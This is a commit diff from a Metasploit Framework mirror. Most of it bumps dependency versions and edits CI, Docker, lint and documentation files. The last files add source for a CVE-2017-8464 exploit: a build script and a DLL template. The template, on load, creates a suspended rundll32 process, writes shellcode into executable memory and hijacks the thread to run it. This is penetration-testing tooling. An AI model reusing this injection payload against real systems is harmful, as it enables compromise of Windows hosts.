infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #1 from bwatters-r7/prep-8509 

bypassuac_injection_winsxs updates and documents
bug/bundler_fix
Ernesto Fernandez 2017-10-11 11:43:57 +02:00 committed by GitHub
parent 23831e6df9 ffa29de6c9
commit 32eb1e9fe6
3849 changed files with 31213 additions and 14807 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
.dockerignore
View File

@ -90,7 +90,7 @@ data/java
# Avoid checking in Meterpreter libs that are built from
# private source. If you're interested in this functionality,
# check out Metasploit Pro: http://metasploit.com/download
# check out Metasploit Pro: https://metasploit.com/download
data/meterpreter/ext_server_pivot.*.dll
# Avoid checking in metakitty, the source for

3
.gitignore vendored
View File

@ -78,7 +78,7 @@ data/java
# Avoid checking in Meterpreter libs that are built from
# private source. If you're interested in this functionality,
# check out Metasploit Pro: http://metasploit.com/download
# check out Metasploit Pro: https://metasploit.com/download
data/meterpreter/ext_server_pivot.*.dll
# Avoid checking in metakitty, the source for
@ -91,3 +91,4 @@ docker-compose.local*
# Ignore python bytecode
*.pyc
rspec.failures

41
.rubocop.yml
View File

@ -8,18 +8,57 @@
# inherit_from: .rubocop_todo.yml
AllCops:
TargetRubyVersion: 2.2
Metrics/ClassLength:
Description: 'Most Metasploit modules are quite large. This is ok.'
Enabled: true
Exclude:
- 'modules/**/*'
Metrics/AbcSize:
Enabled: false
Description: 'This is often a red-herring'
Metrics/CyclomaticComplexity:
Enabled: false
Description: 'This is often a red-herring'
Metrics/PerceivedComplexity:
Enabled: false
Description: 'This is often a red-herring'
Style/FrozenStringLiteralComment:
Enabled: false
Description: 'We cannot support this yet without a lot of things breaking'
Style/RedundantReturn:
Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
Enabled: false
Style/Documentation:
Enabled: true
Description: 'Most Metasploit modules do not have class documentation.'
Exclude:
- 'modules/**/*'
Layout/IndentHeredoc:
Enabled: false
Description: 'We need to leave this disabled for Ruby 2.2 compat, remove in 2018'
Style/GuardClause:
Enabled: false
Description: 'This often introduces bugs in tested code'
Style/NegatedIf:
Enabled: false
Description: 'This often introduces bugs in tested code'
Style/ConditionalAssignment:
Enabled: false
Description: 'This is confusing for folks coming from other languages'
Style/Encoding:
Enabled: true
Description: 'We prefer binary to UTF-8.'
@ -53,7 +92,7 @@ Style/NumericLiterals:
Enabled: false
Description: 'This often hurts readability for exploit-ish code.'
Style/SpaceInsideBrackets:
Layout/SpaceInsideBrackets:
Enabled: false
Description: 'Until module template are final, most modules will fail this.'

2
.ruby-version
View File

@ -1 +1 @@
2.4.1
2.4.2

23
.travis.yml
View File

@ -12,20 +12,24 @@ addons:
language: ruby
rvm:
- '2.2'
- '2.3.4'
- '2.4.1'
- '2.3.5'
- '2.4.2'
env:
# TODO: restore these tests when the code passes them!
# - CMD='bundle exec rake cucumber cucumber:boot CREATE_BINSTUBS=true'
- CMD='bundle exec rake spec SPEC_OPTS="--tag content"'
- CMD='bundle exec rake spec SPEC_OPTS="--tag ~content"'
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'
matrix:
fast_finish: true
jobs:
# build docker image
include:
- rvm: ruby-head
env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build"
- env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build" DOCKER="true"
# we do not need any setup
before_install: skip
install: skip
before_script: skip
before_install:
- "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
- rake --version
@ -44,7 +48,8 @@ before_script:
- git diff --exit-code db/schema.rb
script:
- echo "${CMD}"
- bash -c "${CMD}"
# we need travis_wait because the Docker build job can take longer than 10 minutes
- if [[ "${DOCKER}" == "true" ]]; then echo "Starting Docker build job"; travis_wait 40 "${CMD}"; else bash -c "${CMD}"; fi
notifications:
irc: "irc.freenode.org#msfnotify"

2
.yardopts
View File

@ -2,7 +2,7 @@
--exclude samples/
--exclude \.ut\.rb/
--exclude \.ts\.rb/
--files CONTRIBUTING.md,COPYING,HACKING,LICENSE
--files CONTRIBUTING.md,COPYING,LICENSE
app/**/*.rb
lib/msf/**/*.rb
lib/metasploit/**/*.rb

2
CONTRIBUTING.md
View File

@ -119,4 +119,4 @@ already way ahead of the curve, so keep it up!
[YARD]:http://yardoc.org
[Issues]:https://github.com/rapid7/metasploit-framework/issues
[Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
[metasploit-hackers]:https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
[metasploit-hackers]:https://groups.google.com/forum/#!forum/metasploit-hackers

10
docker/Dockerfile → Dockerfile
View File

@ -1,4 +1,4 @@
FROM ruby:2.4.1-alpine
FROM ruby:2.4.2-alpine
MAINTAINER Rapid7
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
@ -24,7 +24,6 @@ RUN apk update && \
bison \
build-base \
ruby-dev \
libffi-dev\
openssl-dev \
readline-dev \
sqlite-dev \
@ -35,15 +34,14 @@ RUN apk update && \
yaml-dev \
zlib-dev \
ncurses-dev \
git \
&& echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
&& gem update --system \
&& gem install bundler \
&& bundle install --system $BUNDLER_ARGS \
&& apk del .ruby-builddeps \
&& rm -rf /var/cache/apk/*
# fix for robots gem not readable (known bug)
# https://github.com/rapid7/metasploit-framework/issues/6068
RUN chmod o+r /usr/local/bundle/gems/robots-*/lib/robots.rb
RUN adduser -g msfconsole -D $MSF_USER
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)

10
Gemfile
View File

@ -18,9 +18,9 @@ group :development do
gem 'pry'
# module documentation
gem 'octokit'
# metasploit-aggregator as a framework only option for now
# Metasploit::Aggregator external session proxy
gem 'metasploit-aggregator'
# Disabled for now for crypttlv updates
# gem 'metasploit-aggregator'
end
group :development, :test do
@ -33,14 +33,10 @@ group :development, :test do
# Define `rake spec`. Must be in development AND test so that its available by default as a rake test when the
# environment is development
gem 'rspec-rails'
gem 'rspec-rerun'
end
group :test do
# cucumber extension for testing command line applications, like msfconsole
gem 'aruba'
# cucumber + automatic database cleaning with database_cleaner
gem 'cucumber-rails', :require => false
gem 'shoulda-matchers'
# Manipulate Time.now in specs
gem 'timecop'
end

234
Gemfile.lock
View File

@ -1,13 +1,15 @@
PATH
remote: .
specs:
metasploit-framework (4.14.25)
metasploit-framework (4.16.11)
actionpack (~> 4.2.6)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
backports
bcrypt
bcrypt_pbkdf
bit-struct
dnsruby
filesize
jsobfu
json
@ -15,9 +17,9 @@ PATH
metasploit-concern
metasploit-credential
metasploit-model
metasploit-payloads (= 1.2.29)
metasploit-payloads (= 1.3.9)
metasploit_data_models
metasploit_payloads-mettle (= 0.1.9)
metasploit_payloads-mettle (= 0.2.2)
msgpack
nessus_rest
net-ssh
@ -30,9 +32,12 @@ PATH
packetfu
patch_finder
pcaprub
pg
pdf-reader
pg (= 0.20.0)
railties
rb-readline
rbnacl (< 5.0.0)
rbnacl-libsodium
recog
redcarpet
rex-arch
@ -44,7 +49,7 @@ PATH
rex-mime
rex-nop
rex-ole
rex-powershell
rex-powershell (< 0.1.73)
rex-random_identifier
rex-registry
rex-rop_builder
@ -53,7 +58,6 @@ PATH
rex-struct2
rex-text
rex-zip
robots
ruby_smb
rubyntlm
rubyzip
@ -62,141 +66,94 @@ PATH
tzinfo
tzinfo-data
windows_error
xdr
xmlrpc
GEM
remote: https://rubygems.org/
specs:
actionpack (4.2.8)
actionview (= 4.2.8)
activesupport (= 4.2.8)
Ascii85 (1.0.2)
actionpack (4.2.10)
actionview (= 4.2.10)
activesupport (= 4.2.10)
rack (~> 1.6)
rack-test (~> 0.6.2)
rails-dom-testing (~> 1.0, >= 1.0.5)
rails-html-sanitizer (~> 1.0, >= 1.0.2)
actionview (4.2.8)
activesupport (= 4.2.8)
actionview (4.2.10)
activesupport (= 4.2.10)
builder (~> 3.1)
erubis (~> 2.7.0)
rails-dom-testing (~> 1.0, >= 1.0.5)
rails-html-sanitizer (~> 1.0, >= 1.0.3)
activemodel (4.2.8)
activesupport (= 4.2.8)
activemodel (4.2.10)
activesupport (= 4.2.10)
builder (~> 3.1)
activerecord (4.2.8)
activemodel (= 4.2.8)
activesupport (= 4.2.8)
activerecord (4.2.10)
activemodel (= 4.2.10)
activesupport (= 4.2.10)
arel (~> 6.0)
activesupport (4.2.8)
activesupport (4.2.10)
i18n (~> 0.7)
minitest (~> 5.1)
thread_safe (~> 0.3, >= 0.3.4)
tzinfo (~> 1.1)
addressable (2.5.1)
public_suffix (~> 2.0, >= 2.0.2)
addressable (2.5.2)
public_suffix (>= 2.0.2, < 4.0)
afm (0.2.2)
arel (6.0.4)
arel-helpers (2.4.0)
activerecord (>= 3.1.0, < 6)
aruba (0.14.2)
childprocess (~> 0.5.6)
contracts (~> 0.9)
cucumber (>= 1.3.19)
ffi (~> 1.9.10)
rspec-expectations (>= 2.99)
thor (~> 0.19)
backports (3.8.0)
bcrypt (3.1.11)
bindata (2.4.0)
bcrypt_pbkdf (1.0.0)
bindata (2.4.1)
bit-struct (0.16)
builder (3.2.3)
capybara (2.14.0)
addressable
mime-types (>= 1.16)
nokogiri (>= 1.3.3)
rack (>= 1.0.0)
rack-test (>= 0.5.4)
xpath (~> 2.0)
childprocess (0.5.9)
ffi (~> 1.0, >= 1.0.11)
coderay (1.1.1)
contracts (0.16.0)
cucumber (2.4.0)
builder (>= 2.1.2)
cucumber-core (~> 1.5.0)
cucumber-wire (~> 0.0.1)
diff-lcs (>= 1.1.3)
gherkin (~> 4.0)
multi_json (>= 1.7.5, < 2.0)
multi_test (>= 0.1.2)
cucumber-core (1.5.0)
gherkin (~> 4.0)
cucumber-rails (1.5.0)
capybara (>= 1.1.2, < 3)
cucumber (>= 1.3.8, < 4)
mime-types (>= 1.17, < 4)
nokogiri (~> 1.5)
railties (>= 4, < 5.2)
cucumber-wire (0.0.1)
coderay (1.1.2)
crass (1.0.2)
diff-lcs (1.3)
dnsruby (1.60.2)
docile (1.1.5)
erubis (2.7.0)
factory_girl (4.8.0)
factory_girl (4.8.1)
activesupport (>= 3.0.0)
factory_girl_rails (4.8.0)
factory_girl (~> 4.8.0)
railties (>= 3.0.0)
faraday (0.12.1)
faraday (0.13.1)
multipart-post (>= 1.2, < 3)
ffi (1.9.18)
filesize (0.1.1)
fivemat (1.3.4)
gherkin (4.1.3)
google-protobuf (3.3.0)
googleauth (0.5.1)
faraday (~> 0.9)
jwt (~> 1.4)
logging (~> 2.0)
memoist (~> 0.12)
multi_json (~> 1.11)
os (~> 0.9)
signet (~> 0.7)
grpc (1.3.4)
google-protobuf (~> 3.1)
googleauth (~> 0.5.1)
i18n (0.8.4)
fivemat (1.3.5)
hashery (2.1.2)
i18n (0.8.6)
jsobfu (0.4.2)
rkelly-remix
json (2.1.0)
jwt (1.5.6)
little-plugger (1.1.4)
logging (2.2.2)
little-plugger (~> 1.1)
multi_json (~> 1.10)
loofah (2.0.3)
loofah (2.1.1)
crass (~> 1.0.2)
nokogiri (>= 1.5.9)
memoist (0.15.0)
metasm (1.0.3)
metasploit-aggregator (0.2.1)
grpc
rex-arch
metasploit-concern (2.0.4)
metasploit-concern (2.0.5)
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-credential (2.0.9)
metasploit-credential (2.0.12)
metasploit-concern
metasploit-model
metasploit_data_models
pg
railties
rex-socket
rubyntlm
rubyzip
metasploit-model (2.0.4)
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-payloads (1.2.29)
metasploit_data_models (2.0.14)
metasploit-payloads (1.3.9)
metasploit_data_models (2.0.15)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
arel-helpers
@ -206,43 +163,42 @@ GEM
postgres_ext
railties (~> 4.2.6)
recog (~> 2.0)
metasploit_payloads-mettle (0.1.9)
method_source (0.8.2)
mime-types (3.1)
mime-types-data (~> 3.2015)
mime-types-data (3.2016.0521)
mini_portile2 (2.1.0)
minitest (5.10.2)
metasploit_payloads-mettle (0.2.2)
method_source (0.9.0)
mini_portile2 (2.3.0)
minitest (5.10.3)
msgpack (1.1.0)
multi_json (1.12.1)
multi_test (0.1.2)
multipart-post (2.0.0)
nessus_rest (0.1.6)
net-ssh (4.1.0)
network_interface (0.0.1)
nexpose (6.0.0)
nokogiri (1.7.2)
mini_portile2 (~> 2.1.0)
net-ssh (4.2.0)
network_interface (0.0.2)
nexpose (7.1.1)
nokogiri (1.8.1)
mini_portile2 (~> 2.3.0)
octokit (4.7.0)
sawyer (~> 0.8.0, >= 0.5.3)
openssl-ccm (1.2.1)
openvas-omp (0.0.4)
os (0.9.6)
packetfu (1.1.13)
pcaprub
patch_finder (1.0.2)
pcaprub (0.12.4)
pdf-reader (2.0.0)
Ascii85 (~> 1.0.0)
afm (~> 0.2.1)
hashery (~> 2.0)
ruby-rc4
ttfunk
pg (0.20.0)
pg_array_parser (0.0.9)
postgres_ext (3.0.0)
activerecord (>= 4.0.0)
arel (>= 4.0.1)
pg_array_parser (~> 0.0.9)
pry (0.10.4)
pry (0.11.1)
coderay (~> 1.1.0)
method_source (~> 0.8.1)
slop (~> 3.4)
public_suffix (2.0.5)
method_source (~> 0.9.0)
public_suffix (3.0.0)
rack (1.6.8)
rack-test (0.6.3)
rack (>= 1.0)
@ -254,25 +210,29 @@ GEM
rails-deprecated_sanitizer (>= 1.0.1)
rails-html-sanitizer (1.0.3)
loofah (~> 2.0)
railties (4.2.8)
actionpack (= 4.2.8)
activesupport (= 4.2.8)
railties (4.2.10)
actionpack (= 4.2.10)
activesupport (= 4.2.10)
rake (>= 0.8.7)
thor (>= 0.18.1, < 2.0)
rake (12.0.0)
rb-readline (0.5.4)
recog (2.1.8)
rake (12.1.0)
rb-readline (0.5.5)
rbnacl (4.0.2)
ffi
rbnacl-libsodium (1.0.13)
rbnacl (>= 3.0.1)
recog (2.1.15)
nokogiri
redcarpet (3.4.0)
rex-arch (0.1.8)
rex-arch (0.1.11)
rex-text
rex-bin_tools (0.1.3)
rex-bin_tools (0.1.4)
metasm
rex-arch
rex-core
rex-struct2
rex-text
rex-core (0.1.10)
rex-core (0.1.12)
rex-encoder (0.1.4)
metasm
rex-arch
@ -293,16 +253,17 @@ GEM
rex-powershell (0.1.72)
rex-random_identifier
rex-text
rex-random_identifier (0.1.2)
rex-random_identifier (0.1.4)
rex-text
rex-registry (0.1.3)
rex-rop_builder (0.1.3)
metasm
rex-core
rex-text
rex-socket (0.1.6)
rex-socket (0.1.8)
rex-core
rex-sslscan (0.1.5)
rex-core
rex-sslscan (0.1.4)
rex-socket
rex-text
rex-struct2 (0.1.2)
@ -310,7 +271,10 @@ GEM
rex-zip (0.1.3)
rex-text
rkelly-remix (0.0.7)
robots (0.10.1)
rspec (3.6.0)
rspec-core (~> 3.6.0)
rspec-expectations (~> 3.6.0)
rspec-mocks (~> 3.6.0)
rspec-core (3.6.0)
rspec-support (~> 3.6.0)
rspec-expectations (3.6.0)
@ -319,7 +283,7 @@ GEM
rspec-mocks (3.6.0)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.6.0)
rspec-rails (3.6.0)
rspec-rails (3.6.1)
actionpack (>= 3.0)
activesupport (>= 3.0)
railties (>= 3.0)
@ -327,7 +291,10 @@ GEM
rspec-expectations (~> 3.6.0)
rspec-mocks (~> 3.6.0)
rspec-support (~> 3.6.0)
rspec-rerun (1.1.0)
rspec (~> 3.0)
rspec-support (3.6.0)
ruby-rc4 (0.1.5)
ruby_smb (0.0.18)
bindata
rubyntlm
@ -337,53 +304,44 @@ GEM
sawyer (0.8.1)
addressable (>= 2.3.5, < 2.6)
faraday (~> 0.8, < 1.0)
shoulda-matchers (3.1.1)
activesupport (>= 4.0.0)
signet (0.7.3)
addressable (~> 2.3)
faraday (~> 0.9)
jwt (~> 1.5)
multi_json (~> 1.10)
simplecov (0.14.1)
simplecov (0.15.1)
docile (~> 1.1.0)
json (>= 1.8, < 3)
simplecov-html (~> 0.10.0)
simplecov-html (0.10.1)
slop (3.6.0)
simplecov-html (0.10.2)
sqlite3 (1.3.13)
sshkey (1.9.0)
thor (0.19.4)
thor (0.20.0)
thread_safe (0.3.6)
timecop (0.8.1)
timecop (0.9.1)
ttfunk (1.5.1)
tzinfo (1.2.3)
thread_safe (~> 0.1)
tzinfo-data (1.2017.2)
tzinfo (>= 1.0.0)
windows_error (0.1.2)
xdr (2.0.0)
activemodel (>= 4.2.7)
activesupport (>= 4.2.7)
xmlrpc (0.3.0)
xpath (2.1.0)
nokogiri (~> 1.3)
yard (0.9.9)
PLATFORMS
ruby
DEPENDENCIES
aruba
cucumber-rails
factory_girl_rails
fivemat
metasploit-aggregator
metasploit-framework!
octokit
pry
rake
redcarpet
rspec-rails
shoulda-matchers
rspec-rerun
simplecov
timecop
yard
BUNDLED WITH
1.15.1
1.15.4

38
HACKING
View File

@ -1,38 +0,0 @@
HACKING
=======
(Last updated: 2014-03-04)
This document almost entirely deprecated by:
CONTRIBUTING.md
in the same directory as this file, and to a lesser extent:
The Metasploit Development Environment
https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment
Common Coding Mistakes
https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes
The Ruby Style Guide
https://github.com/bbatsov/ruby-style-guide
Ruby 1.9: What to Expect
http://slideshow.rubyforge.org/ruby19.html
You can use the the "./tools/msftidy.rb" script against your new and
changed modules to do some rudimentary checking for various style and
syntax violations.
Licensing for Your New Content
==============================
By submitting code contributions to the Metasploit Project it is
assumed that you are offering your code under the Metasploit License
or similar 3-clause BSD-compatible license. MIT and Ruby Licenses
are also fine. We specifically cannot include GPL code. LGPL code
is accepted on a case by case basis for libraries only and is never
accepted for modules.

79
LICENSE_GEMS
View File

@ -1,71 +1,62 @@
This file is auto-generated by tools/dev/update_gem_licenses.sh
actionpack, 4.2.8, MIT
actionview, 4.2.8, MIT
activemodel, 4.2.8, MIT
activerecord, 4.2.8, MIT
activesupport, 4.2.8, MIT
Ascii85, 1.0.2, MIT
actionpack, 4.2.9, MIT
actionview, 4.2.9, MIT
activemodel, 4.2.9, MIT
activerecord, 4.2.9, MIT
activesupport, 4.2.9, MIT
addressable, 2.5.1, "Apache 2.0"
afm, 0.2.2, MIT
arel, 6.0.4, MIT
arel-helpers, 2.4.0, unknown
aruba, 0.14.2, MIT
backports, 3.8.0, MIT
bcrypt, 3.1.11, MIT
bindata, 2.4.0, ruby
bit-struct, 0.16, ruby
builder, 3.2.3, MIT
bundler, 1.15.0, MIT
capybara, 2.14.0, MIT
childprocess, 0.5.9, MIT
bundler, 1.15.1, MIT
coderay, 1.1.1, MIT
contracts, 0.16.0, "Simplified BSD"
cucumber, 2.4.0, MIT
cucumber-core, 1.5.0, MIT
cucumber-rails, 1.5.0, MIT
cucumber-wire, 0.0.1, MIT
diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
dnsruby, 1.60.1, "Apache 2.0"
docile, 1.1.5, MIT
erubis, 2.7.0, MIT
factory_girl, 4.8.0, MIT
factory_girl_rails, 4.8.0, MIT
faraday, 0.12.1, MIT
ffi, 1.9.18, "New BSD"
filesize, 0.1.1, MIT
fivemat, 1.3.3, MIT
gherkin, 4.1.3, MIT
fivemat, 1.3.5, MIT
google-protobuf, 3.3.0, "New BSD"
googleauth, 0.5.1, "Apache 2.0"
grpc, 1.3.4, "New BSD"
i18n, 0.8.1, MIT
grpc, 1.4.1, "New BSD"
hashery, 2.1.2, "Simplified BSD"
i18n, 0.8.6, MIT
jsobfu, 0.4.2, "New BSD"
json, 2.1.0, ruby
jwt, 1.5.6, MIT
little-plugger, 1.1.4, MIT
logging, 2.2.2, MIT
loofah, 2.0.3, MIT
memoist, 0.15.0, MIT
memoist, 0.16.0, MIT
metasm, 1.0.3, LGPL
metasploit-aggregator, 0.2.1, "New BSD"
metasploit-concern, 2.0.4, "New BSD"
metasploit-credential, 2.0.9, "New BSD"
metasploit-framework, 4.14.23, "New BSD"
metasploit-concern, 2.0.5, "New BSD"
metasploit-credential, 2.0.10, "New BSD"
metasploit-framework, 4.15.0, "New BSD"
metasploit-model, 2.0.4, "New BSD"
metasploit-payloads, 1.2.29, "3-clause (or ""modified"") BSD"
metasploit_data_models, 2.0.14, "New BSD"
metasploit_payloads-mettle, 0.1.9, "3-clause (or ""modified"") BSD"
metasploit-payloads, 1.2.37, "3-clause (or ""modified"") BSD"
metasploit_data_models, 2.0.15, "New BSD"
metasploit_payloads-mettle, 0.1.10, "3-clause (or ""modified"") BSD"
method_source, 0.8.2, MIT
mime-types, 3.1, MIT
mime-types-data, 3.2016.0521, MIT
mini_portile2, 2.1.0, MIT
mini_portile2, 2.2.0, MIT
minitest, 5.10.2, MIT
msgpack, 1.1.0, "Apache 2.0"
multi_json, 1.12.1, MIT
multi_test, 0.1.2, MIT
multipart-post, 2.0.0, MIT
nessus_rest, 0.1.6, MIT
net-ssh, 4.1.0, MIT
network_interface, 0.0.1, MIT
nexpose, 6.0.0, BSD
nokogiri, 1.7.2, MIT
nexpose, 6.1.0, BSD
nokogiri, 1.8.0, MIT
octokit, 4.7.0, MIT
openssl-ccm, 1.2.1, MIT
openvas-omp, 0.0.4, MIT
@ -73,6 +64,7 @@ os, 0.9.6, MIT
packetfu, 1.1.13, BSD
patch_finder, 1.0.2, "New BSD"
pcaprub, 0.12.4, LGPL-2.1
pdf-reader, 2.0.0, MIT
pg, 0.20.0, "New BSD"
pg_array_parser, 0.0.9, unknown
postgres_ext, 3.0.0, MIT
@ -83,14 +75,14 @@ rack-test, 0.6.3, MIT
rails-deprecated_sanitizer, 1.0.3, MIT
rails-dom-testing, 1.0.8, MIT
rails-html-sanitizer, 1.0.3, MIT
railties, 4.2.8, MIT
railties, 4.2.9, MIT
rake, 12.0.0, MIT
rb-readline, 0.5.4, BSD
recog, 2.1.8, unknown
recog, 2.1.11, unknown
redcarpet, 3.4.0, MIT
rex-arch, 0.1.4, "New BSD"
rex-bin_tools, 0.1.3, "New BSD"
rex-core, 0.1.10, "New BSD"
rex-arch, 0.1.9, "New BSD"
rex-bin_tools, 0.1.4, "New BSD"
rex-core, 0.1.11, "New BSD"
rex-encoder, 0.1.4, "New BSD"
rex-exploitation, 0.1.14, "New BSD"
rex-java, 0.1.5, "New BSD"
@ -101,23 +93,25 @@ rex-powershell, 0.1.72, "New BSD"
rex-random_identifier, 0.1.2, "New BSD"
rex-registry, 0.1.3, "New BSD"
rex-rop_builder, 0.1.3, "New BSD"
rex-socket, 0.1.6, "New BSD"
rex-socket, 0.1.8, "New BSD"
rex-sslscan, 0.1.4, "New BSD"
rex-struct2, 0.1.2, "New BSD"
rex-text, 0.2.15, "New BSD"
rex-zip, 0.1.3, "New BSD"
rkelly-remix, 0.0.7, MIT
robots, 0.10.1, MIT
rspec, 3.6.0, MIT
rspec-core, 3.6.0, MIT
rspec-expectations, 3.6.0, MIT
rspec-mocks, 3.6.0, MIT
rspec-rails, 3.6.0, MIT
rspec-rerun, 1.1.0, MIT
rspec-support, 3.6.0, MIT
ruby_smb, 0.0.17, "New BSD"
ruby-rc4, 0.1.5, MIT
ruby_smb, 0.0.18, "New BSD"
rubyntlm, 0.6.2, MIT
rubyzip, 1.2.1, "Simplified BSD"
sawyer, 0.8.1, MIT
shoulda-matchers, 3.1.1, MIT
signet, 0.7.3, "Apache 2.0"
simplecov, 0.14.1, MIT
simplecov-html, 0.10.1, MIT
@ -126,10 +120,11 @@ sqlite3, 1.3.13, "New BSD"
sshkey, 1.9.0, MIT
thor, 0.19.4, MIT
thread_safe, 0.3.6, "Apache 2.0"
timecop, 0.8.1, MIT
timecop, 0.9.1, MIT
ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
tzinfo, 1.2.3, MIT
tzinfo-data, 1.2017.2, MIT
windows_error, 0.1.2, BSD
xdr, 2.0.0, "Apache 2.0"
xmlrpc, 0.3.0, ruby
xpath, 2.1.0, MIT
yard, 0.9.9, MIT

5
README.md
View File

@ -14,13 +14,12 @@ New bugs and feature requests should be directed to:
API documentation for writing modules can be found at:
https://rapid7.github.io/metasploit-framework/api
Questions and suggestions can be sent to:
https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list
Installing
--
Generally, you should use [the free installer](https://www.metasploit.com/download),
Generally, you should use [the free installer](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers),
which contains all of the dependencies and will get you up and running with a
few clicks. See the [Dev Environment Setup](https://r-7.co/MSF-DEV) if
you'd like to deal with dependencies on your own.

1
Rakefile
View File

@ -11,6 +11,7 @@ Metasploit::Framework::Require.optionally_active_record_railtie
begin
require 'rspec/core'
require 'rspec-rerun/tasks'
rescue LoadError
puts "rspec not in bundle, so can't set up spec tasks. " \
"To run specs ensure to install the development and test groups."

9
Vagrantfile vendored
View File

@ -3,10 +3,7 @@
Vagrant.configure(2) do |config|
config.ssh.forward_x11 = true
config.vm.box = "ubuntu/trusty64"
# TODO: find a minimal image that keeps up-to-date and
# supports multiple providers
#config.vm.box = "phusion/ubuntu-14.04-amd64"
config.vm.box = "ubuntu/xenial64"
config.vm.network :forwarded_port, guest: 4444, host: 4444
config.vm.provider "vmware" do |v|
v.memory = 2048
@ -26,14 +23,14 @@ Vagrant.configure(2) do |config|
[ #"echo 127.0.1.1 `cat /etc/hostname` >> /etc/hosts", work around a bug in official Ubuntu Xenial cloud images
"apt-get update",
"apt-get dist-upgrade -y",
"apt-get -y install curl build-essential git tig vim john nmap libpq-dev libpcap-dev gnupg fortune postgresql postgresql-contrib",
"apt-get -y install curl build-essential git tig vim john nmap libpq-dev libpcap-dev gnupg2 fortune postgresql postgresql-contrib",
].each do |step|
config.vm.provision "shell", inline: step
end
[ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
"curl -L https://get.rvm.io | bash -s stable",
"source ~/.rvm/scripts/rvm && cd /vagrant && rvm --install .ruby-version",
"source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
"source ~/.rvm/scripts/rvm && cd /vagrant && gem install bundler",
"source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
"mkdir -p ~/.msf4",

16
data/exploits/cve-2017-8464/src/build.sh Executable file
View File

@ -0,0 +1,16 @@
#!/bin/sh
rm -f *.o *.dll
CCx86="i686-w64-mingw32"
CCx64="x86_64-w64-mingw32"
${CCx64}-gcc -m64 -c -Os template.c -Wall -shared
${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll
${CCx64}-strip -s temp.dll -o template_x64_windows.dll
rm -f temp.dll *.o
${CCx86}-gcc -c -Os template.c -Wall -shared
${CCx86}-dllwrap --def template.def *.o -o temp.dll
${CCx86}-strip -s temp.dll -o template_x86_windows.dll
rm -f temp.dll *.o

95
data/exploits/cve-2017-8464/src/template.c Executable file
View File

@ -0,0 +1,95 @@
// Based on https://github.com/rapid7/metasploit-framework/tree/cac890a797d0d770260074dfe703eb5cfb63bd46/data/templates/src/pe/dll
// - removed ExitThread(0) to prevent an Explorer crash
// - added Mutex to prevent invoking payload multiple times (at least try)
#include <windows.h>
#include "template.h"
void inline_bzero(void *p, size_t l)
{
BYTE *q = (BYTE *)p;
size_t x = 0;
for (x = 0; x < l; x++)
*(q++) = 0x00;
}
void ExecutePayload(void);
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
switch (dwReason)
{
case DLL_PROCESS_ATTACH:
ExecutePayload();
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}
void ExecutePayload(void)
{
PROCESS_INFORMATION pi;
STARTUPINFO si;
CONTEXT ctx;
LPVOID ep;
HANDLE hMutex;
SECURITY_ATTRIBUTES MutexAttributes;
inline_bzero(&MutexAttributes, sizeof(MutexAttributes));
MutexAttributes.nLength = sizeof(MutexAttributes);
MutexAttributes.bInheritHandle = TRUE; // inherit the handle
hMutex = CreateMutex(&MutexAttributes, TRUE, "MsfMutex");
if(hMutex == NULL)
{
return;
}
if(GetLastError() == ERROR_ALREADY_EXISTS)
{
CloseHandle(hMutex);
return;
}
if(GetLastError() == ERROR_ACCESS_DENIED)
{
CloseHandle(hMutex);
return;
}
// Start up the payload in a new process
inline_bzero(&si, sizeof(si));
si.cb = sizeof(si);
// Create a suspended process, write shellcode into stack, make stack RWX, resume it
if(CreateProcess(NULL, "rundll32.exe", NULL, NULL, TRUE, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
GetThreadContext(pi.hThread, &ctx);
ep = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
#ifdef _WIN64
ctx.Rip = (DWORD64)ep;
#else
ctx.Eip = (DWORD)ep;
#endif
SetThreadContext(pi.hThread, &ctx);
ResumeThread(pi.hThread);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
CloseHandle(hMutex);
}

3
data/exploits/cve-2017-8464/src/template.def Normal file
View File

@ -0,0 +1,3 @@
EXPORTS
